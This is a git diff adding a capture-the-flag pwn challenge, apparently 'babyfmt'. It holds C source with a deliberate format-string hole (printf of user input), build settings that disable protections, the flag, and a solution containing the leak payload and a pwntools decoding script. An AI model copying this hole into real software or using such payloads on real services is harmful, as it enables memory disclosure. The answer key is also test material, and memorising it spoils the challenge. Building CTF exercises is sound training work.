diff --git a/pwn/babyfmt/challenge.yml b/pwn/babyfmt/challenge.yml new file mode 100644 index 0000000..76d806c --- /dev/null +++ b/pwn/babyfmt/challenge.yml @@ -0,0 +1,31 @@ +name: "Babyfmt" +author: "s3nn" +category: pwn + +description: | + What's so bad about printf()? + + https://www.notion.so/apogiatzis/MSc-CTF-Pwn-9ecbafd7791a413dae7d37a24ec27fb9?p=d9b319fe6a3a4766a0033bb2607fec85&pm=s + +value: 500 +type: dynamic_docker +extra: + initial: 500 + minimum: 100 + decay: 25 + redirect_type: direct + compose_stack: !filecontents docker-compose.yml + + +flags: + - GTBQ{l3ak_all_The_t1ngs!!!} + +files: + - "public/challenge" + +tags: + - pwn + - easy / medium + +state: visible +version: "0.1" diff --git a/pwn/babyfmt/docker-compose.yml b/pwn/babyfmt/docker-compose.yml new file mode 100644 index 0000000..172d56b --- /dev/null +++ b/pwn/babyfmt/docker-compose.yml @@ -0,0 +1,11 @@ +services: + challenge: + restart: always + ports: + - 1337:1337 + image: ghcr.io/cybermouflons/gtbq-2024/babyfmt:latest + build: + context: ./setup + dockerfile: Dockerfile + labels: + ctf.challenge.name: babyfmt diff --git a/pwn/babyfmt/public/challenge b/pwn/babyfmt/public/challenge new file mode 100644 index 0000000..7f43ab7 Binary files /dev/null and b/pwn/babyfmt/public/challenge differ diff --git a/pwn/babyfmt/setup/Dockerfile b/pwn/babyfmt/setup/Dockerfile new file mode 100644 index 0000000..c9288a3 --- /dev/null +++ b/pwn/babyfmt/setup/Dockerfile @@ -0,0 +1,17 @@ +FROM ubuntu:22.04 + +RUN apt-get update && apt-get install -y socat gcc-multilib + +RUN addgroup --system ctf && adduser --system --group ctf + +COPY ./challenge /home/ctf +COPY ./flag.txt /home/ctf + +RUN chmod +x /home/ctf/challenge +RUN chmod +r /home/ctf/flag.txt + +USER ctf +WORKDIR /home/ctf + +EXPOSE 1337 +CMD ["socat", "-v","TCP-LISTEN:1337,reuseaddr,fork", "EXEC:'./challenge'"] diff --git a/pwn/babyfmt/setup/Makefile b/pwn/babyfmt/setup/Makefile new file mode 100644 index 0000000..32aee19 --- /dev/null +++ b/pwn/babyfmt/setup/Makefile @@ -0,0 +1,5 @@ +all: + gcc -fno-stack-protector -no-pie -o challenge ./challenge.c + +clean: + rm challenge diff --git a/pwn/babyfmt/setup/challenge b/pwn/babyfmt/setup/challenge new file mode 100644 index 0000000..7f43ab7 Binary files /dev/null and b/pwn/babyfmt/setup/challenge differ diff --git a/pwn/babyfmt/setup/challenge.c b/pwn/babyfmt/setup/challenge.c new file mode 100644 index 0000000..358a05e --- /dev/null +++ b/pwn/babyfmt/setup/challenge.c @@ -0,0 +1,44 @@ +#include +#include +#include +#include + +void setup(){ + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + fflush(stdout); +} + +int main() { + setup(); + + FILE *fptr; + char flag[34]; + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file \n"); + exit(0); + } + fgets(flag, 34, fptr); + + char fake1[] = "make"; + char fake2[] = "sure"; + char fake3[] = "you"; + char fake4[] = "leak"; + char fake5[] = "allthethings"; + char fmtstr[32] = {0}; + + + printf("Plese tell us your name number: "); + read(0, fmtstr, 31); + + printf(fmtstr); + + return 0; + +} + + + + \ No newline at end of file diff --git a/pwn/babyfmt/setup/flag.txt b/pwn/babyfmt/setup/flag.txt new file mode 100644 index 0000000..5b880f4 --- /dev/null +++ b/pwn/babyfmt/setup/flag.txt @@ -0,0 +1 @@ +GTBQ{l3ak_all_The_t1ngs!!!} \ No newline at end of file diff --git a/pwn/babyfmt/sol/sol.md b/pwn/babyfmt/sol/sol.md new file mode 100644 index 0000000..a853c48 --- /dev/null +++ b/pwn/babyfmt/sol/sol.md @@ -0,0 +1,25 @@ +# Leak + +Send the following input (might be slightly different on systems) +``` +%14$p.%15$p.%16$p.%17$p +``` + +# Unhex: + +```python + +from pwn import * + +sol = b'' + +a = '0x61336c7b51425447.0x68545f6c6c615f6b.0x2173676e31745f65.0x7d2121'.replace('0x','') +flag = a.split('.') + +for part in flag: + sol += unhex(part)[::-1] + +log.success(sol) + +``` +